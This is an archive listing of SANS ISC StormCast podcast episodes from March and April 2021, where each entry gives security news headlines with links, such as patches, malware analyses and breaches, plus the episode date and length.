Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+April+2021+Patch+Tuesday/27306/ NAME:WRECK DNS Vulnerabilities https://www.forescout.com/research-labs/namewreck/
4/14/20215 minutes, 43 seconds
Episode Artwork

ISC StormCast for Wednesday, April 14th, 2021

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+April+2021+Patch+Tuesday/27306/ NAME:WRECK DNS Vulnerabilities https://www.forescout.com/research-labs/namewreck/
4/14/20215 minutes, 43 seconds
Episode Artwork

ISC StormCast for Tuesday, April 13th, 2021

Example of Cleartext Cobalt Strike Traffic https://isc.sans.edu/forums/diary/Example+of+Cleartext+Cobalt+Strike+Traffic+Thanks+Brad/27300/ ASA 5506 Series Security Appliances Field Notice https://www.cisco.com/c/en/us/support/docs/field-notices/720/fn72019.html Expired Certificate for PulseSecure VPN Devices https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44781/?kA13Z000000fzbR Pwn2Own Summary https://thehackernews.com/2021/04/windows-ubuntu-zoom-safari-ms-exchange.html Tesla Exploited Via Google Chrome Vulnerability https://leethax0.rs/2021/04/ElectricChrome/
4/13/20216 minutes, 4 seconds
Episode Artwork

ISC StormCast for Tuesday, April 13th, 2021

Example of Cleartext Cobalt Strike Traffic https://isc.sans.edu/forums/diary/Example+of+Cleartext+Cobalt+Strike+Traffic+Thanks+Brad/27300/ ASA 5506 Series Security Appliances Field Notice https://www.cisco.com/c/en/us/support/docs/field-notices/720/fn72019.html Expired Certificate for PulseSecure VPN Devices https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44781/?kA13Z000000fzbR Pwn2Own Summary https://thehackernews.com/2021/04/windows-ubuntu-zoom-safari-ms-exchange.html Tesla Exploited Via Google Chrome Vulnerability https://leethax0.rs/2021/04/ElectricChrome/
4/13/20216 minutes, 4 seconds
Episode Artwork

ISC StormCast for Monday, April 12th, 2021

No Python Interpreter? This Simple RAT Installs Its Own Copy https://isc.sans.edu/forums/diary/No+Python+Interpreter+This+Simple+RAT+Installs+Its+Own+Copy/27292/ Facebook Mistakingly Suggests Adding Domains To Public Suffix List will Ease Tracking https://publicsuffix.org https://www.facebook.com/business/help/331612538028890?id=428636648170202 Facebook Ads Used to Push Clubhouse Related Malware https://www.ehackingnews.com/2021/04/cybercriminals-used-facebook-ads-to.html Identifying Cobalt Strike DNS Intrastructure https://labs.f-secure.com/blog/detecting-exposed-cobalt-strike-dns-redirectors
4/12/20216 minutes, 48 seconds
Episode Artwork

ISC StormCast for Monday, April 12th, 2021

No Python Interpreter? This Simple RAT Installs Its Own Copy https://isc.sans.edu/forums/diary/No+Python+Interpreter+This+Simple+RAT+Installs+Its+Own+Copy/27292/ Facebook Mistakingly Suggests Adding Domains To Public Suffix List will Ease Tracking https://publicsuffix.org https://www.facebook.com/business/help/331612538028890?id=428636648170202 Facebook Ads Used to Push Clubhouse Related Malware https://www.ehackingnews.com/2021/04/cybercriminals-used-facebook-ads-to.html Identifying Cobalt Strike DNS Intrastructure https://labs.f-secure.com/blog/detecting-exposed-cobalt-strike-dns-redirectors
4/12/20216 minutes, 48 seconds
Episode Artwork

ISC StormCast for Friday, April 9th, 2021

Simple Powershell Ransomware Creating a 7Z Archive of your Files https://isc.sans.edu/forums/diary/Simple+Powershell+Ransomware+Creating+a+7Z+Archive+of+your+Files/27286/ HTML Lego: Hidden Phishing at Free JavaScript Site https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/html-lego-hidden-phishing-at-free-javascript-site/ Royal FLush: Privilege Escalation Vulnerability in Azure Functions https://www.intezer.com/blog/cloud-security/royal-flush-privilege-escalation-vulnerability-in-azure-functions/ Cisco Small Business Router Vulnerabilities https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-rce-q3rxHnvm Google Chrome Blocking Port 10080 https://github.com/whatwg/fetch/issues/1191#issuecomment-797659444
4/9/20215 minutes, 42 seconds
Episode Artwork

ISC StormCast for Friday, April 9th, 2021

Simple Powershell Ransomware Creating a 7Z Archive of your Files https://isc.sans.edu/forums/diary/Simple+Powershell+Ransomware+Creating+a+7Z+Archive+of+your+Files/27286/ HTML Lego: Hidden Phishing at Free JavaScript Site https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/html-lego-hidden-phishing-at-free-javascript-site/ Royal FLush: Privilege Escalation Vulnerability in Azure Functions https://www.intezer.com/blog/cloud-security/royal-flush-privilege-escalation-vulnerability-in-azure-functions/ Cisco Small Business Router Vulnerabilities https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-rce-q3rxHnvm Google Chrome Blocking Port 10080 https://github.com/whatwg/fetch/issues/1191#issuecomment-797659444
4/9/20215 minutes, 42 seconds
Episode Artwork

ISC StormCast for Thursday, April 8th, 2021

WiFi IDS's and Private MAC Addresses https://isc.sans.edu/forums/diary/WiFi+IDS+and+Private+MAC+Addresses/27288/ Update on PHP Incident https://externals.io/message/113981 Details about Linux Kernel Bluetooth Vulnerabilities https://google.github.io/security-research/pocs/linux/bleedingtooth/writeup.html LinkedIn Leak https://www.ehackingnews.com/2021/04/data-stolen-from-500-million-linkedin.html VMWare Carbon Black Cloud Workload Applicatnce Authentication Bypass https://www.vmware.com/security/advisories/VMSA-2021-0005.html Cisco SD-WAN vManage Software Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-YuTVWqy
4/8/20216 minutes, 44 seconds
Episode Artwork

ISC StormCast for Thursday, April 8th, 2021

WiFi IDS's and Private MAC Addresses https://isc.sans.edu/forums/diary/WiFi+IDS+and+Private+MAC+Addresses/27288/ Update on PHP Incident https://externals.io/message/113981 Details about Linux Kernel Bluetooth Vulnerabilities https://google.github.io/security-research/pocs/linux/bleedingtooth/writeup.html LinkedIn Leak https://www.ehackingnews.com/2021/04/data-stolen-from-500-million-linkedin.html VMWare Carbon Black Cloud Workload Applicatnce Authentication Bypass https://www.vmware.com/security/advisories/VMSA-2021-0005.html Cisco SD-WAN vManage Software Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-YuTVWqy
4/8/20216 minutes, 44 seconds
Episode Artwork

ISC StormCast for Wednesday, April 7th, 2021

Malspam with Lokibot vs. Outlook and RFCs https://isc.sans.edu/forums/diary/Malspam+with+Lokibot+vs+Outlook+and+RFCs/27282/ SAP Attacks https://us-cert.cisa.gov/ncas/current-activity/2021/04/06/malicious-cyber-activity-targeting-critical-sap-applications QNAP Upates Older EOL Devices https://www.qnap.com/de-de/release-notes/qts/4.3.6.1620/20210322 GIGASET Android Phones Infected by Compromised Update Server https://www.heise.de/news/Gigaset-Malware-Befall-von-Android-Geraeten-des-Herstellers-gibt-Raetsel-auf-6006464.html
4/7/20215 minutes, 48 seconds
Episode Artwork

ISC StormCast for Wednesday, April 7th, 2021

Malspam with Lokibot vs. Outlook and RFCs https://isc.sans.edu/forums/diary/Malspam+with+Lokibot+vs+Outlook+and+RFCs/27282/ SAP Attacks https://us-cert.cisa.gov/ncas/current-activity/2021/04/06/malicious-cyber-activity-targeting-critical-sap-applications QNAP Upates Older EOL Devices https://www.qnap.com/de-de/release-notes/qts/4.3.6.1620/20210322 GIGASET Android Phones Infected by Compromised Update Server https://www.heise.de/news/Gigaset-Malware-Befall-von-Android-Geraeten-des-Herstellers-gibt-Raetsel-auf-6006464.html
4/7/20215 minutes, 48 seconds
Episode Artwork

ISC StormCast for Tuesday, April 6th, 2021

LinkedIn Spear-Phishing Campaign Targets Job Hunters https://threatpost.com/linkedin-spear-phishing-job-hunters/165240/ Malicious Text Files (CVE-2019-8761) https://www.paulosyibelo.com/2021/04/this-man-thought-opening-txt-file-is.html Rust Privacy Concerns https://www.bleepingcomputer.com/news/security/most-loved-programming-language-rust-sparks-privacy-concerns/
4/6/20215 minutes, 45 seconds
Episode Artwork

ISC StormCast for Tuesday, April 6th, 2021

LinkedIn Spear-Phishing Campaign Targets Job Hunters https://threatpost.com/linkedin-spear-phishing-job-hunters/165240/ Malicious Text Files (CVE-2019-8761) https://www.paulosyibelo.com/2021/04/this-man-thought-opening-txt-file-is.html Rust Privacy Concerns https://www.bleepingcomputer.com/news/security/most-loved-programming-language-rust-sparks-privacy-concerns/
4/6/20215 minutes, 45 seconds
Episode Artwork

ISC StormCast for Monday, April 5th, 2021

C2 Activity: Sandboxes or Real Victims https://isc.sans.edu/forums/diary/C2+Activity+Sandboxes+or+Real+Victims/27272/ Exploitation of Fortinet FortiOS Vulnerabilities https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios https://www.ic3.gov/Media/News/2021/210402.pdf GitHub Actions Used to Mine Crypto https://therecord.media/github-investigating-crypto-mining-campaign-abusing-its-server-infrastructure/ Large Facebook Leak https://thehackernews.com/2021/04/533-million-facebook-users-phone.html
4/5/20215 minutes, 57 seconds
Episode Artwork

ISC StormCast for Monday, April 5th, 2021

C2 Activity: Sandboxes or Real Victims https://isc.sans.edu/forums/diary/C2+Activity+Sandboxes+or+Real+Victims/27272/ Exploitation of Fortinet FortiOS Vulnerabilities https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios https://www.ic3.gov/Media/News/2021/210402.pdf GitHub Actions Used to Mine Crypto https://therecord.media/github-investigating-crypto-mining-campaign-abusing-its-server-infrastructure/ Large Facebook Leak https://thehackernews.com/2021/04/533-million-facebook-users-phone.html
4/5/20215 minutes, 57 seconds
Episode Artwork

ISC StormCast for Friday, April 2nd, 2021

April 2021 Forensic Quiz https://isc.sans.edu/forums/diary/April+2021+Forensic+Quiz/27266/ Coinhive Domains Used to Warn Victims https://www.troyhunt.com/i-now-own-the-coinhive-domain-heres-how-im-fighting-cryptojacking-and-doing-good-things-with-content-security-policies/ Detecting Attacker's BITS Utility Use https://www.fireeye.com/blog/threat-research/2021/03/attacker-use-of-windows-background-intelligent-transfer-service.html Kansas Man Indicted For Tampering With Public Water System https://www.justice.gov/usao-ks/pr/indictment-kansas-man-indicted-tampering-public-water-system Older QNAP Devices Vulnerable And No Longer Patched https://securingsam.com/new-vulnerabilities-allow-complete-takeover/
4/2/20216 minutes, 16 seconds
Episode Artwork

ISC StormCast for Friday, April 2nd, 2021

April 2021 Forensic Quiz https://isc.sans.edu/forums/diary/April+2021+Forensic+Quiz/27266/ Coinhive Domains Used to Warn Victims https://www.troyhunt.com/i-now-own-the-coinhive-domain-heres-how-im-fighting-cryptojacking-and-doing-good-things-with-content-security-policies/ Detecting Attacker's BITS Utility Use https://www.fireeye.com/blog/threat-research/2021/03/attacker-use-of-windows-background-intelligent-transfer-service.html Kansas Man Indicted For Tampering With Public Water System https://www.justice.gov/usao-ks/pr/indictment-kansas-man-indicted-tampering-public-water-system Older QNAP Devices Vulnerable And No Longer Patched https://securingsam.com/new-vulnerabilities-allow-complete-takeover/
4/2/20216 minutes, 16 seconds
Episode Artwork

ISC StormCast for Thursday, April 1st, 2021

Quick Analysis of a Modular InfoStealer https://isc.sans.edu/forums/diary/Quick+Analysis+of+a+Modular+InfoStealer/27264/ Google Chrome Update / DoH on Linux https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_30.html https://docs.google.com/document/d/1zAdSK393IznaLKQ0ItOmwLBy59fIq9ydxBRJQX-2ntQ/edit# Chinese Tax Authority Facial Recognition System Fooled https://www.scmp.com/tech/tech-trends/article/3127645/chinese-government-run-facial-recognition-system-hacked-tax
4/1/20214 minutes, 53 seconds
Episode Artwork

ISC StormCast for Thursday, April 1st, 2021

Quick Analysis of a Modular InfoStealer https://isc.sans.edu/forums/diary/Quick+Analysis+of+a+Modular+InfoStealer/27264/ Google Chrome Update / DoH on Linux https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_30.html https://docs.google.com/document/d/1zAdSK393IznaLKQ0ItOmwLBy59fIq9ydxBRJQX-2ntQ/edit# Chinese Tax Authority Facial Recognition System Fooled https://www.scmp.com/tech/tech-trends/article/3127645/chinese-government-run-facial-recognition-system-hacked-tax
4/1/20214 minutes, 53 seconds
Episode Artwork

ISC StormCast for Wednesday, March 31st, 2021

Old TLS Versions: Gone but not Forgotten https://isc.sans.edu/forums/diary/Old+TLS+versions+gone+but+not+forgotten+well+not+really+gone+either/27260/ Perl Netmask Vulnerability https://blog.urth.org/2021/03/29/security-issues-in-perl-ip-address-distros/ VMWare vRealize Vulnerability https://www.vmware.com/security/advisories/VMSA-2021-0004.html Pre-P0wned Docker Containers https://unit42.paloaltonetworks.com/malicious-cryptojacking-images/
3/31/20215 minutes, 37 seconds
Episode Artwork

ISC StormCast for Wednesday, March 31st, 2021

Old TLS Versions: Gone but not Forgotten https://isc.sans.edu/forums/diary/Old+TLS+versions+gone+but+not+forgotten+well+not+really+gone+either/27260/ Perl Netmask Vulnerability https://blog.urth.org/2021/03/29/security-issues-in-perl-ip-address-distros/ VMWare vRealize Vulnerability https://www.vmware.com/security/advisories/VMSA-2021-0004.html Pre-P0wned Docker Containers https://unit42.paloaltonetworks.com/malicious-cryptojacking-images/
3/31/20215 minutes, 37 seconds
Episode Artwork

ISC StormCast for Tuesday, March 30th, 2021

Jumping Into Shellcode https://isc.sans.edu/forums/diary/Jumping+into+Shellcode/27256/ PHP git repo compromised https://news-web.php.net/php.internals/113838 npm "netmask" package vulnerability https://sick.codes/universal-netmask-npm-package-used-by-270000-projects-vulnerable-to-octal-input-data-server-side-request-forgery-remote-file-inclusion-local-file-inclusion-and-more-cve-2021-28918/
3/30/20216 minutes, 54 seconds
Episode Artwork

ISC StormCast for Tuesday, March 30th, 2021

Jumping Into Shellcode https://isc.sans.edu/forums/diary/Jumping+into+Shellcode/27256/ PHP git repo compromised https://news-web.php.net/php.internals/113838 npm "netmask" package vulnerability https://sick.codes/universal-netmask-npm-package-used-by-270000-projects-vulnerable-to-octal-input-data-server-side-request-forgery-remote-file-inclusion-local-file-inclusion-and-more-cve-2021-28918/
3/30/20216 minutes, 54 seconds
Episode Artwork

ISC StormCast for Friday, March 19th, 2021

A Simple Python Keylogger https://isc.sans.edu/forums/diary/Simple+Python+Keylogger/27216/ New macOS Malware XcodeSpy Targets Xcode Developers with EggShell Backdoor https://labs.sentinelone.com/new-macos-malware-xcodespy-targets-xcode-developers-with-eggshell-backdoor/ Zoom Screen Sharing Leak https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-044.txt MyBB Remote Code Execution https://blog.mybb.com/2021/03/10/mybb-1-8-26-released-security-release/
3/19/20216 minutes, 4 seconds
Episode Artwork

ISC StormCast for Friday, March 19th, 2021

A Simple Python Keylogger https://isc.sans.edu/forums/diary/Simple+Python+Keylogger/27216/ New macOS Malware XcodeSpy Targets Xcode Developers with EggShell Backdoor https://labs.sentinelone.com/new-macos-malware-xcodespy-targets-xcode-developers-with-eggshell-backdoor/ Zoom Screen Sharing Leak https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-044.txt MyBB Remote Code Execution https://blog.mybb.com/2021/03/10/mybb-1-8-26-released-security-release/
3/19/20216 minutes, 4 seconds
Episode Artwork

ISC StormCast for Thursday, March 18th, 2021

"American Rescue Plan" Used as Theme in Phishing Lures Dropping Dridex https://cofense.com/blog/american-rescue-plan-phish/ Apple May Split Security Updates from Other Updates https://9to5mac.com/2021/03/15/ios-security-fixes-could-soon-be-delivered-separately-from-other-updates-beta-code-suggests/ Polyglot Images on Twitter https://twitter.com/David3141593/status/1371978592679309315 Magento 2 PHP Credit Card Skimmer Saves to JPG https://blog.sucuri.net/2021/03/magento-2-php-credit-card-skimmer-saves-to-jpg.html
3/18/20215 minutes, 52 seconds
Episode Artwork

ISC StormCast for Thursday, March 18th, 2021

"American Rescue Plan" Used as Theme in Phishing Lures Dropping Dridex https://cofense.com/blog/american-rescue-plan-phish/ Apple May Split Security Updates from Other Updates https://9to5mac.com/2021/03/15/ios-security-fixes-could-soon-be-delivered-separately-from-other-updates-beta-code-suggests/ Polyglot Images on Twitter https://twitter.com/David3141593/status/1371978592679309315 Magento 2 PHP Credit Card Skimmer Saves to JPG https://blog.sucuri.net/2021/03/magento-2-php-credit-card-skimmer-saves-to-jpg.html
3/18/20215 minutes, 52 seconds
Episode Artwork

ISC StormCast for Wednesday, March 17th, 2021

One-Click Microsoft Exchange On-Premises Mitigation Tool https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/ Microsoft Explains Authentication Issues with Azure Active Directory https://www.documentcloud.org/documents/20515443-authentication-errors-across-multiple-microsoft-services-tracking-id-ln01-p8z JavaScript Less Side-Channel Exploits https://arxiv.org/abs/2103.04952
3/17/20215 minutes, 55 seconds
Episode Artwork

ISC StormCast for Wednesday, March 17th, 2021

One-Click Microsoft Exchange On-Premises Mitigation Tool https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/ Microsoft Explains Authentication Issues with Azure Active Directory https://www.documentcloud.org/documents/20515443-authentication-errors-across-multiple-microsoft-services-tracking-id-ln01-p8z JavaScript Less Side-Channel Exploits https://arxiv.org/abs/2103.04952
3/17/20215 minutes, 55 seconds
Episode Artwork

ISC StormCast for Tuesday, March 16th, 2021

NimzaLoader Malware Written in "nim" https://www.proofpoint.com/uk/blog/threat-insight/nimzaloader-ta800s-new-initial-access-malware Windows 10 Emergency Update to Fix Printing Crashes https://www.bleepingcomputer.com/news/microsoft/windows-10-emergency-updates-released-to-fix-printing-crashes/ Windows Azure AD Outage https://status.azure.com/status IBM DB2 Patch https://www.ibm.com/support/pages/node/6427855
3/16/20215 minutes, 2 seconds
Episode Artwork

ISC StormCast for Tuesday, March 16th, 2021

NimzaLoader Malware Written in "nim" https://www.proofpoint.com/uk/blog/threat-insight/nimzaloader-ta800s-new-initial-access-malware Windows 10 Emergency Update to Fix Printing Crashes https://www.bleepingcomputer.com/news/microsoft/windows-10-emergency-updates-released-to-fix-printing-crashes/ Windows Azure AD Outage https://status.azure.com/status IBM DB2 Patch https://www.ibm.com/support/pages/node/6427855
3/16/20215 minutes, 2 seconds
Episode Artwork

ISC StormCast for Monday, March 15th, 2021

Wireshark Code Execution Exploit https://gitlab.com/wireshark/wireshark/-/issues/17232 Google Chrome Vulnerability Exploited in the Wild https://vulmon.com/vulnerabilitydetails?qid=CVE-2021-21193 Malware Installs Honeypot https://blog.netlab.360.com/new_threat_zhtrap_botnet_en/ Twitter "Memphis" Bug https://www.bleepingcomputer.com/news/technology/twitter-bug-automatically-suspends-you-when-tweeting-memphis/
3/15/20214 minutes, 53 seconds
Episode Artwork

ISC StormCast for Monday, March 15th, 2021

Wireshark Code Execution Exploit https://gitlab.com/wireshark/wireshark/-/issues/17232 Google Chrome Vulnerability Exploited in the Wild https://vulmon.com/vulnerabilitydetails?qid=CVE-2021-21193 Malware Installs Honeypot https://blog.netlab.360.com/new_threat_zhtrap_botnet_en/ Twitter "Memphis" Bug https://www.bleepingcomputer.com/news/technology/twitter-bug-automatically-suspends-you-when-tweeting-memphis/
3/15/20214 minutes, 53 seconds
Episode Artwork

ISC StormCast for Friday, March 12th, 2021

Pichktochart - Phishing with Infographics https://isc.sans.edu/forums/diary/Piktochart+Phishing+with+Infographics/27194/ ProxyLogon Public PoC https://www.praetorian.com/blog/reproducing-proxylogon-exploit/ Windows 10 Crashes After March 10th Updates https://www.bleepingcomputer.com/news/microsoft/windows-10-crashes-when-printing-due-to-microsoft-march-updates/ DNS Vulnerability Updates https://www.mcafee.com/blogs/other-blogs/mcafee-labs/seven-windows-wonders-critical-vulnerabilities-in-dns-dynamic-updates/ Rob Upchurch: Preventing Windows 10 SMHNR DNS Leakage https://www.sans.org/reading-room/whitepapers/dns/preventing-windows-10-smhnr-dns-leakage-40165
3/12/202115 minutes, 44 seconds
Episode Artwork

ISC StormCast for Friday, March 12th, 2021

Pichktochart - Phishing with Infographics https://isc.sans.edu/forums/diary/Piktochart+Phishing+with+Infographics/27194/ ProxyLogon Public PoC https://www.praetorian.com/blog/reproducing-proxylogon-exploit/ Windows 10 Crashes After March 10th Updates https://www.bleepingcomputer.com/news/microsoft/windows-10-crashes-when-printing-due-to-microsoft-march-updates/ DNS Vulnerability Updates https://www.mcafee.com/blogs/other-blogs/mcafee-labs/seven-windows-wonders-critical-vulnerabilities-in-dns-dynamic-updates/ Rob Upchurch: Preventing Windows 10 SMHNR DNS Leakage https://www.sans.org/reading-room/whitepapers/dns/preventing-windows-10-smhnr-dns-leakage-40165
3/12/202115 minutes, 44 seconds
Episode Artwork

ISC StormCast for Thursday, March 11th, 2021

SharpRDP - PSExec with PSExec, PSRemoting without PowerShell https://isc.sans.edu/forums/diary/SharpRDP+PSExec+without+PSExec+PSRemoting+without+PowerShell/27188/ F5 Critical Vulnerabilities https://support.f5.com/csp/article/K02566623 Netgear Updates https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/ Linux Foundation sigstore https://sigstore.dev
3/11/20215 minutes, 21 seconds
Episode Artwork

ISC StormCast for Thursday, March 11th, 2021

SharpRDP - PSExec with PSExec, PSRemoting without PowerShell https://isc.sans.edu/forums/diary/SharpRDP+PSExec+without+PSExec+PSRemoting+without+PowerShell/27188/ F5 Critical Vulnerabilities https://support.f5.com/csp/article/K02566623 Netgear Updates https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/ Linux Foundation sigstore https://sigstore.dev
3/11/20215 minutes, 21 seconds
Episode Artwork

ISC StormCast for Wednesday, March 10th, 2021

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+March+2021+Patch+Tuesday/27184/ Adobe Updates https://helpx.adobe.com/security.html Network Camera Breach https://www.bloomberg.com/news/articles/2021-03-09/hackers-expose-tesla-jails-in-breach-of-150-000-security-cams https://www.bleepingcomputer.com/news/security/hackers-access-surveillance-cameras-at-tesla-cloudflare-banks-more/ git vulnerability https://www.openwall.com/lists/oss-security/2021/03/09/3
3/10/20217 minutes, 13 seconds
Episode Artwork

ISC StormCast for Wednesday, March 10th, 2021

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+March+2021+Patch+Tuesday/27184/ Adobe Updates https://helpx.adobe.com/security.html Network Camera Breach https://www.bloomberg.com/news/articles/2021-03-09/hackers-expose-tesla-jails-in-breach-of-150-000-security-cams https://www.bleepingcomputer.com/news/security/hackers-access-surveillance-cameras-at-tesla-cloudflare-banks-more/ git vulnerability https://www.openwall.com/lists/oss-security/2021/03/09/3
3/10/20217 minutes, 13 seconds
Episode Artwork

ISC StormCast for Tuesday, March 9th, 2021

YARA and CyberChef https://isc.sans.edu/forums/diary/YARA+and+CyberChef/27180/ Apple Updates Everything https://support.apple.com/en-us/HT201222 Google Adds Port 554 to "Restricted Ports" https://chromium.googlesource.com/chromium/src.git/+/refs/heads/master/net/base/port_util.cc Yet Another Intel Side Channel Attack https://arxiv.org/pdf/2103.03443.pdf
3/9/20215 minutes, 35 seconds
Episode Artwork

ISC StormCast for Tuesday, March 9th, 2021

YARA and CyberChef https://isc.sans.edu/forums/diary/YARA+and+CyberChef/27180/ Apple Updates Everything https://support.apple.com/en-us/HT201222 Google Adds Port 554 to "Restricted Ports" https://chromium.googlesource.com/chromium/src.git/+/refs/heads/master/net/base/port_util.cc Yet Another Intel Side Channel Attack https://arxiv.org/pdf/2103.03443.pdf
3/9/20215 minutes, 35 seconds
Episode Artwork

ISC StormCast for Monday, March 8th, 2021

Update on Microsoft Exchange Vulnerability https://github.com/microsoft/CSS-Exchange/tree/main/Security https://github.com/nccgroup/Cyber-Defence/tree/master/Intelligence/Exchange https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b Microsoft Adding Excel 4.0 Macro Hooks to AMSI https://www.microsoft.com/security/blog/2021/03/03/xlm-amsi-new-runtime-defense-against-excel-4-0-macro-malware/ Apple Find My Device Leak https://arxiv.org/pdf/2103.02282.pdf
3/8/20217 minutes, 29 seconds
Episode Artwork

ISC StormCast for Monday, March 8th, 2021

Update on Microsoft Exchange Vulnerability https://github.com/microsoft/CSS-Exchange/tree/main/Security https://github.com/nccgroup/Cyber-Defence/tree/master/Intelligence/Exchange https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b Microsoft Adding Excel 4.0 Macro Hooks to AMSI https://www.microsoft.com/security/blog/2021/03/03/xlm-amsi-new-runtime-defense-against-excel-4-0-macro-malware/ Apple Find My Device Leak https://arxiv.org/pdf/2103.02282.pdf
3/8/20217 minutes, 29 seconds
Episode Artwork

ISC StormCast for Friday, March 5th, 2021

From VBS, PowerShell, C Sharp, Process Hollowing to RAT https://isc.sans.edu/forums/diary/From+VBS+PowerShell+C+Sharp+Process+Hollowing+to+RAT/27168/ Cisco Patches Snort Related Vulnerabilities https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snort-ethernet-dos-HGXgJH8n VMWare View Planner Update https://www.vmware.com/security/advisories/VMSA-2021-0003.html Google's FLoC Algorithm https://www.eff.org/deeplinks/2021/03/googles-floc-terrible-idea Supermicro Trickbot Patch https://www.supermicro.com/en/support/security/trickbot
3/5/20216 minutes, 1 second
Episode Artwork

ISC StormCast for Friday, March 5th, 2021

From VBS, PowerShell, C Sharp, Process Hollowing to RAT https://isc.sans.edu/forums/diary/From+VBS+PowerShell+C+Sharp+Process+Hollowing+to+RAT/27168/ Cisco Patches Snort Related Vulnerabilities https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snort-ethernet-dos-HGXgJH8n VMWare View Planner Update https://www.vmware.com/security/advisories/VMSA-2021-0003.html Google's FLoC Algorithm https://www.eff.org/deeplinks/2021/03/googles-floc-terrible-idea Supermicro Trickbot Patch https://www.supermicro.com/en/support/security/trickbot
3/5/20216 minutes, 1 second
Episode Artwork

ISC StormCast for Thursday, March 4th, 2021

Microsoft Exchange Followup https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/ Saltstack Vulnerability https://www.immersivelabs.com/resources/blog/why-so-salty-local-privilege-escalation-on-saltstack-minions/ GRUB2 Patches https://seclists.org/oss-sec/2021/q1/189 Dependency Confusion in the Wild https://threatpost.com/malicious-code-bombs-amazon-lyft-slack-zillow/164455/
3/4/20214 minutes, 53 seconds
Episode Artwork

ISC StormCast for Thursday, March 4th, 2021

Microsoft Exchange Followup https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/ Saltstack Vulnerability https://www.immersivelabs.com/resources/blog/why-so-salty-local-privilege-escalation-on-saltstack-minions/ GRUB2 Patches https://seclists.org/oss-sec/2021/q1/189 Dependency Confusion in the Wild https://threatpost.com/malicious-code-bombs-amazon-lyft-slack-zillow/164455/
3/4/20214 minutes, 53 seconds
Episode Artwork

ISC StormCast for Wednesday, March 3rd, 2021

Qakbot Infection with Cobalt Strike https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike/27158/ Exchange Server 0-Day Exploits https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ Google Chrome 0-Day Exploits https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html
3/3/20217 minutes, 15 seconds
Episode Artwork

ISC StormCast for Wednesday, March 3rd, 2021

Qakbot Infection with Cobalt Strike https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike/27158/ Exchange Server 0-Day Exploits https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ Google Chrome 0-Day Exploits https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html
3/3/20217 minutes, 15 seconds
Episode Artwork

ISC StormCast for Tuesday, March 2nd, 2021

Fun with DNS over TLS and https://isc.sans.edu/forums/diary/Fun+with+DNS+over+TLS+DoT/27150/ Gootloader Update https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/ AOL Phishing https://www.bleepingcomputer.com/news/security/beware-aol-phishing-email-states-your-account-will-be-closed/ Spectre Exploit in the Wild https://dustri.org/b/spectre-exploits-in-the-wild.html
3/2/20216 minutes, 13 seconds
Episode Artwork

ISC StormCast for Tuesday, March 2nd, 2021

Fun with DNS over TLS and https://isc.sans.edu/forums/diary/Fun+with+DNS+over+TLS+DoT/27150/ Gootloader Update https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/ AOL Phishing https://www.bleepingcomputer.com/news/security/beware-aol-phishing-email-states-your-account-will-be-closed/ Spectre Exploit in the Wild https://dustri.org/b/spectre-exploits-in-the-wild.html
3/2/20216 minutes, 13 seconds
Episode Artwork

ISC StormCast for Monday, March 1st, 2021

Pretending to be an Outlook Version Update https://isc.sans.edu/forums/diary/Pretending+to+be+an+Outlook+Version+Update/27144/ Geolocating Satori Botnet Scanning Port 26 https://isc.sans.edu/forums/diary/So+where+did+those+Satori+attacks+come+from/27140/ Alexa Skill Security https://www.ndss-symposium.org/wp-content/uploads/ndss2021_5A-1_23111_paper.pdf TMobile Data Breach / SIM Swapping https://beta.documentcloud.org/documents/20492859-t-mobile-feb-2021-bc-data-breach
3/1/20215 minutes, 2 seconds
Episode Artwork

ISC StormCast for Monday, March 1st, 2021

